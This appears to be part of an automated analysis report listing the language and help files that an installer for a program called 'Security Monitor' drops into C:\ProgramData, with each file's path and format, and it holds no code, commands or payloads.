C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\noPRO.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\noURL.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\norton_warning.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\scheduler.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\screenshot.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\settings.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\siteblock.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\snapshot.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\sound.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\video.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\websites.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french.lng (copy)
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\SN.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\activity.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\alarms.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\clipboard.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\delivery.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-0KCCD.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-2GUUI.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-36UM7.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-3H5BQ.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-3NTK1.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-3QN2R.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-8MK2C.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-D3DJK.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-E89GH.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-F1ES7.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-FO77V.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-FU8J8.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-H76HF.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-KLJRQ.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-OIOC3.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-PR69D.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-RQET0.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\keyboard.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\logging.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\noPRO.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\noURL.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\scheduler.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\screenshot.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\settings.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\siteblock.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\snapshot.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\sound.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\video.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\websites.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german.lng (copy)
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\SN.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\activity.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\alarms.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\clipboard.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\delivery.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-3QHCE.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-6SQ84.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-7CL9E.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-B0JMM.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-EN318.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-FL5BQ.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-FVVOE.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-O8R4C.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-ORGS0.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-PT364.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-QIOUR.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-RS6T4.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-S5VVI.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-SVP0V.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-TPK2S.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-V2OM0.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-VEGMO.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\keyboard.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\logging.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\noPRO.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\noURL.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\scheduler.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\screenshot.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\settings.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\siteblock.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\snapshot.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\sound.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\video.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\websites.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-0FCJK.tmp
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-7OID3.tmp
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-ADU5J.tmp
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-C0ARR.tmp
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-F6EVE.tmp
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-H3CKS.tmp
|
Unicode text, UTF-8 text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-IM23K.tmp
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-M3COJ.tmp
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-NU6LJ.tmp
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-PNRTI.tmp
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-SKTI0.tmp
|
Unicode text, UTF-8 text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-SN766.tmp
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian.lng (copy)
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\SN.rtf (copy)
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\activity.rtf (copy)
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\alarms.rtf (copy)
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\clipboard.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\delivery.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-10ULP.tmp
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-6B6HR.tmp
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-6INJ3.tmp
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-6MKTA.tmp
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-7E8CR.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-7TL78.tmp
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-GCRSF.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-HJMQK.tmp
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-JCAU4.tmp
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-JQGJ6.tmp
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-KDLM5.tmp
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-L8314.tmp
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-P8V34.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-QKG8H.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-R3MGE.tmp
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-RNJ6A.tmp
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-UVP7U.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\keyboard.rtf (copy)
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\logging.rtf (copy)
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\noPRO.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\noURL.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\scheduler.rtf (copy)
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\screenshot.rtf (copy)
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\settings.rtf (copy)
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\siteblock.rtf (copy)
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\snapshot.rtf (copy)
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\sound.rtf (copy)
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\video.rtf (copy)
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\websites.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\japan.lng (copy)
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\korean.lng (copy)
|
Unicode text, UTF-8 text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese.lng (copy)
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\SN.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\activity.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\alarms.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\clipboard.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\delivery.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-2L042.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-2LHUU.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-2QKG2.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-352RA.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
